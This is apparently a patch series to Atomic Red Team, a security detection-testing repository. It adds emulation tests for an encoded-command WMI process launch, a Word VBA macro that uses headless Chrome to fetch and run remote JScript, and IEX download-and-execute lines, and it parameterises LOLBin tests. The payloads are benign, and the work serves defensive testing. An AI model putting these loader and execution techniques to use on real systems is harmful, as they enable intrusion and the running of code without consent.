715edd28..a3481b43 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1007,6 +1007,7 @@ - Atomic Test #4: WMI Reconnaissance List Remote Services [windows] - Atomic Test #5: WMI Execute Local Process [windows] - Atomic Test #6: WMI Execute Remote Process [windows] + - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows] # exfiltration - [T1020 Automated Exfiltration](../../T1020/T1020.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b338dc3a..1496a8c8 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -55193,6 +55193,23 @@ execution: cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 +' + name: command_prompt + - name: Create a Process using WMI Query and an Encoded Command + auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c + description: | + Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand + Powershell -nop -exec bypass -EncodedCommand + Where the –EncodedCommand, once decoded, would resemble: + Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION + The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe + You should expect to see notepad.exe running after execution of this test. + [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) + supported_platforms: + - windows + executor: + command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA + ' name: command_prompt lateral-movement: diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index 7f800193..e5fdd283 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -18,6 +18,8 @@ An adversary can use WMI to interact with local and remote systems and use it as - [Atomic Test #6 - WMI Execute Remote Process](#atomic-test-6---wmi-execute-remote-process) +- [Atomic Test #7 - Create a Process using WMI Query and an Encoded Command](#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command) +
@@ -199,4 +201,34 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name +
+
+ +## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command +Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand + Powershell -nop -exec bypass -EncodedCommand +Where the –EncodedCommand, once decoded, would resemble: + Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION +The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe +You should expect to see notepad.exe running after execution of this test. +[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA +``` + + + + + +
From d721e09edea53aeb0fa54408308649553794f226 Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Fri, 8 Jan 2021 11:12:14 -0500 Subject: [PATCH 058/131] Scriptcontrol (#1348) * initial * updates * initial * update * updates * updates * updates * updates * updates * updates * updates * updates * updates * updates * Update T1204.002.yaml * Update T1204.002.yaml * updates * remove code * correct url * works with 32bit Chrome, simplified commands Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1070.001/T1070.001.yaml | 2 +- atomics/T1204.002/T1204.002.yaml | 32 +++++++ .../T1204.002/src/chromeexec-macrocode.txt | 94 +++++++++++++++++++ atomics/T1204.002/src/payload.txt | 1 + 4 files changed, 128 insertions(+), 1 deletion(-) create mode 100644 atomics/T1204.002/src/chromeexec-macrocode.txt create mode 100644 atomics/T1204.002/src/payload.txt diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index 8232cff2..bed05bed 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -57,4 +57,4 @@ atomic_tests: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell - elevation_required: true + elevation_required: true \ No newline at end of file diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index a967bf64..f414c09c 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -255,3 +255,35 @@ atomic_tests: Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore name: powershell +- name: Headless Chrome code execution via VBA + description: | + This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local + webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver + and pull down the script and execute it. By default the payload will execute calc.exe on the system. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + Microsoft Word must be installed + prereq_command: | + try { + $wdApp = New-Object -COMObject "Word.Application" + Stop-Process -Name "winword" + exit 0 } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Word manually to meet this requirement" + - description: | + Google Chrome must be installed + prereq_command: | + try { + $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Google Chrome manually to meet this requirement" + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" + name: powershell diff --git a/atomics/T1204.002/src/chromeexec-macrocode.txt b/atomics/T1204.002/src/chromeexec-macrocode.txt new file mode 100644 index 00000000..769e067d --- /dev/null +++ b/atomics/T1204.002/src/chromeexec-macrocode.txt @@ -0,0 +1,94 @@ +Private Sub ExecChrome() + + Dim myWS As Object + Dim exec As Object + Dim url As String + + url = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/payload.txt" + + cmd = findChrome & " --headless " + cmd = cmd & "--no-sandbox --enable-logging --disable-gpu " + cmd = cmd & "--dump-dom " & url + + Set myWS = CreateObject("WScript.Shell") + Set exec = myWS.exec(cmd) + body = exec.StdOut.ReadAll + exec.Terminate + + ' files formatted as .txt and .html + prepend = "" + prepend2 = "
"
+    append = "
" + append2 = "" + out = Replace(body, prepend, "") + out = Replace(out, prepend2, "") + out = Replace(out, append, "") + out = Replace(out, append2, "") + + Set oSC = CreateObjectx86("ScriptControl") + oSC.Language = "JScript" + Result = oSC.Eval("(" + out + ")") + + CreateObjectx86 Empty + +End Sub + +Function CreateObjectx86(sProgID) + + Static oWnd As Object + Dim bRunning As Boolean + + #If Win64 Then + bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0 + If IsEmpty(sProgID) Then + If bRunning Then oWnd.Close + Exit Function + End If + If Not bRunning Then + Set oWnd = CreateWindow() + oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript" + End If + Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID) + #Else + If Not IsEmpty(sProgID) Then Set CreateObjectx86 = CreateObject(sProgID) + #End If + +End Function + +Function CreateWindow() + + ' source http://forum.script-coding.com/viewtopic.php?pid=75356#p75356 + Dim sSignature, oShellWnd, oProc + + On Error Resume Next + sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38) + CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""""", 0, False + Do + For Each oShellWnd In CreateObject("Shell.Application").Windows + Set CreateWindow = oShellWnd.GetProperty(sSignature) + If Err.Number = 0 Then Exit Function + Err.Clear + Next + Loop + +End Function + +Function findChrome() + + Dim x86Path As String + Dim x64Path As String + + x64Path = "C:\Program Files\Google\Chrome\Application\chrome.exe" + x86Path = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + + If Dir(x86Path) = "" Then + If Dir(x64Path) = "" Then + MsgBox "Google Chrome is not installed, please install" + Else + findChrome = x64Path + End If + Else + findChrome = x86Path + End If + +End Function diff --git a/atomics/T1204.002/src/payload.txt b/atomics/T1204.002/src/payload.txt new file mode 100644 index 00000000..994cb625 --- /dev/null +++ b/atomics/T1204.002/src/payload.txt @@ -0,0 +1 @@ +(new ActiveXObject("WScript.Shell")).Run("calc.exe") \ No newline at end of file From abfd1e042b6364b6114e3a8705cf8be56ac415c9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 8 Jan 2021 16:12:36 +0000 Subject: [PATCH 059/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1204.002/T1204.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index f414c09c..5af3a07b 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -256,6 +256,7 @@ atomic_tests: Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore name: powershell - name: Headless Chrome code execution via VBA + auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a description: | This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f36777d6..f13e1a9e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -649,3 +649,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 f14d956a-5b6e-4a93-847f-0c415142f07d c2969434-672b-4ec8-8df0-bbb91f40e250 7db7a7f9-9531-4840-9b30-46220135441c +a19ee671-ed98-4e9d-b19c-d1954a51585a From 9660d0a33e6d59b08196739084cc4af5e7d769fb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 8 Jan 2021 16:12:45 +0000 Subject: [PATCH 060/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 39 +++++++++++++ atomics/T1204.002/T1204.002.md | 56 +++++++++++++++++++ 6 files changed, 99 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 41599715..a0454d4d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -691,6 +691,7 @@ execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell +execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 0027bea2..cc6a88a4 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -510,6 +510,7 @@ execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell +execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 0873dfef..dac4c811 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1286,6 +1286,7 @@ - Atomic Test #4: OSTAP JS version [windows] - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] + - Atomic Test #7: Headless Chrome code execution via VBA [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a3481b43..817d3cce 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -956,6 +956,7 @@ - Atomic Test #4: OSTAP JS version [windows] - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] + - Atomic Test #7: Headless Chrome code execution via VBA [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 1496a8c8..6e9b54f1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -53093,6 +53093,45 @@ execution: Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore name: powershell + - name: Headless Chrome code execution via VBA + auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a + description: | + This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local + webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver + and pull down the script and execute it. By default the payload will execute calc.exe on the system. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft Word must be installed + +' + prereq_command: | + try { + $wdApp = New-Object -COMObject "Word.Application" + Stop-Process -Name "winword" + exit 0 } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + +' + - description: 'Google Chrome must be installed + +' + prereq_command: | + try { + $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Google Chrome manually + to meet this requirement" + +' + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" + name: powershell T1204.001: technique: created: '2020-03-11T14:43:31.706Z' diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index 245c1eae..d2f77b2e 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -20,6 +20,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently - [Atomic Test #6 - Excel 4 Macro](#atomic-test-6---excel-4-macro) +- [Atomic Test #7 - Headless Chrome code execution via VBA](#atomic-test-7---headless-chrome-code-execution-via-vba) +
@@ -368,4 +370,58 @@ Write-Host "You will need to install Microsoft Excel manually to meet this requi +
+
+ +## Atomic Test #7 - Headless Chrome code execution via VBA +This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local +webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver +and pull down the script and execute it. By default the payload will execute calc.exe on the system. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft Word must be installed +##### Check Prereq Commands: +```powershell +try { + $wdApp = New-Object -COMObject "Word.Application" + Stop-Process -Name "winword" + exit 0 } catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Word manually to meet this requirement" +``` +##### Description: Google Chrome must be installed +##### Check Prereq Commands: +```powershell +try { + $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Google Chrome manually to meet this requirement" +``` + + + +
From 39954ec1aff26ceaf051949bc4aa72c5bbc6b89e Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Fri, 8 Jan 2021 09:15:29 -0700 Subject: [PATCH 061/131] Update T1218.yaml (#1360) Updated microsoft.workflow.compiler.exe test Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com> Co-authored-by: Carrie Roberts --- atomics/T1218/T1218.yaml | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 4aca2242..22b66cc3 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -134,18 +134,25 @@ atomic_tests: description: XML to execution type: path default: PathToAtomicsFolder\T1218\src\T1218.xml + mwcpath: + description: Default location of Microsoft.Workflow.Compiler.exe + type: Path + default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 + mwcname: + description: Default name of microsoft.workflow.compiler.exe + type: Path + default: microsoft.workflow.compiler.exe dependency_executor_name: powershell dependencies: - description: | .Net must be installed for this test to work correctly. prereq_command: | - if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ) {exit 0} else {exit 1} + if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} get_prereq_command: | write-host ".Net must be installed for this test to work correctly." executor: command: | - Set-Location -path PathToAtomicsFolder\T1218\src ; - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt + #{mwcpath}\#{mwcname} "#{xml_payload}" output.txt name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -163,18 +170,25 @@ atomic_tests: description: renamed Microsoft.Workflow.Compiler type: path default: PathToAtomicsFolder\T1218\src\svchost.exe + mwcpath: + description: Default location of Microsoft.Workflow.Compiler.exe + type: Path + default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 + mwcname: + description: Default name of microsoft.workflow.compiler.exe + type: Path + default: microsoft.workflow.compiler.exe dependency_executor_name: powershell dependencies: - description: | .Net must be installed for this test to work correctly. prereq_command: | - Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force + Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} get_prereq_command: | write-host "you need to rename workflow complier before you run this test" executor: command: | - Set-Location -path PathToAtomicsFolder\T1218\src ; #{renamed_binary} #{xml_payload} output.txt name: powershell elevation_required: false From c0591491f159c128f05d57ccd36663c55de7e495 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 8 Jan 2021 16:16:04 +0000 Subject: [PATCH 062/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 32 +++++++++++++++++++++++--------- atomics/T1218/T1218.md | 12 +++++++----- 2 files changed, 30 insertions(+), 14 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6e9b54f1..bce5af38 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -39466,11 +39466,19 @@ defense-evasion: description: XML to execution type: path default: PathToAtomicsFolder\T1218\src\T1218.xml + mwcpath: + description: Default location of Microsoft.Workflow.Compiler.exe + type: Path + default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 + mwcname: + description: Default name of microsoft.workflow.compiler.exe + type: Path + default: microsoft.workflow.compiler.exe dependency_executor_name: powershell dependencies: - description: ".Net must be installed for this test to work correctly.\n" - prereq_command: 'if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe - ) {exit 0} else {exit 1} + prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit + 1} ' get_prereq_command: 'write-host ".Net must be installed for this test to work @@ -39478,9 +39486,9 @@ defense-evasion: ' executor: - command: | - Set-Location -path PathToAtomicsFolder\T1218\src ; - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt + command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt + +' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -39500,20 +39508,26 @@ defense-evasion: description: renamed Microsoft.Workflow.Compiler type: path default: PathToAtomicsFolder\T1218\src\svchost.exe + mwcpath: + description: Default location of Microsoft.Workflow.Compiler.exe + type: Path + default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 + mwcname: + description: Default name of microsoft.workflow.compiler.exe + type: Path + default: microsoft.workflow.compiler.exe dependency_executor_name: powershell dependencies: - description: ".Net must be installed for this test to work correctly.\n" prereq_command: | - Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force + Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" ' executor: - command: | - Set-Location -path PathToAtomicsFolder\T1218\src ; - #{renamed_binary} #{xml_payload} output.txt + command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell elevation_required: false - name: Invoke-ATHRemoteFXvGPUDisablementCommand base test diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index a1441aa2..b17493d2 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -235,14 +235,15 @@ Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly tha | Name | Description | Type | Default Value | |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| +| mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319| +| mwcname | Default name of microsoft.workflow.compiler.exe | Path | microsoft.workflow.compiler.exe| #### Attack Commands: Run with `powershell`! ```powershell -Set-Location -path PathToAtomicsFolder\T1218\src ; -C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt +#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt ``` @@ -252,7 +253,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ##### Description: .Net must be installed for this test to work correctly. ##### Check Prereq Commands: ```powershell -if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ) {exit 0} else {exit 1} +if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -278,13 +279,14 @@ Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net as |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| | renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe| +| mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319| +| mwcname | Default name of microsoft.workflow.compiler.exe | Path | microsoft.workflow.compiler.exe| #### Attack Commands: Run with `powershell`! ```powershell -Set-Location -path PathToAtomicsFolder\T1218\src ; #{renamed_binary} #{xml_payload} output.txt ``` @@ -295,7 +297,7 @@ Set-Location -path PathToAtomicsFolder\T1218\src ; ##### Description: .Net must be installed for this test to work correctly. ##### Check Prereq Commands: ```powershell -Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force +Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: From bbcf68588933b50ebf05f094cde5e38da4957edd Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Fri, 8 Jan 2021 09:19:55 -0700 Subject: [PATCH 063/131] Update T1055.cs (#1361) dll was named incorrectly in .cs. Fixed and confirmed operational. Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com> Co-authored-by: Carrie Roberts --- atomics/T1055.004/src/T1055.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1055.004/src/T1055.cs b/atomics/T1055.004/src/T1055.cs index 9f43822f..60e95834 100644 --- a/atomics/T1055.004/src/T1055.cs +++ b/atomics/T1055.004/src/T1055.cs @@ -75,7 +75,7 @@ public class ProcessInject // Path to dll that will be injected - string dllName = @"C:\AtomicRedTeam\atomics\T1055\bin\w64-exec-calc-shellcode.dll"; + string dllName = @"C:\AtomicRedTeam\atomics\T1055.004\src\T1055.dll"; // Allocate memory for dll path and store pointer From a5af0cc64468d1e11d3f1190892a29e2c47489b4 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Fri, 8 Jan 2021 09:22:48 -0700 Subject: [PATCH 064/131] Update T1218.010.yaml (#1359) Modified T1218.010 to allow for modification of path and name of regsvr32.exe Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com> Co-authored-by: Carrie Roberts --- atomics/T1218.010/T1218.010.yaml | 42 ++++++++++++++++++++++++++++---- 1 file changed, 37 insertions(+), 5 deletions(-) diff --git a/atomics/T1218.010/T1218.010.yaml b/atomics/T1218.010/T1218.010.yaml index 6605e05f..809290a5 100644 --- a/atomics/T1218.010/T1218.010.yaml +++ b/atomics/T1218.010/T1218.010.yaml @@ -12,6 +12,14 @@ atomic_tests: description: Name of the local file, include path. type: Path default: PathToAtomicsFolder\T1218.010\src\RegSvr32.sct + regsvr32path: + description: Default location of Regsvr32.exe + type: Path + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe dependency_executor_name: powershell dependencies: - description: | @@ -23,7 +31,7 @@ atomic_tests: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}" executor: command: | - regsvr32.exe /s /u /i:#{filename} scrobj.dll + #{regsvr32path}\#{regsvr32name} /s /u /i:#{filename} scrobj.dll name: command_prompt - name: Regsvr32 remote COM scriptlet execution @@ -38,9 +46,17 @@ atomic_tests: description: URL to 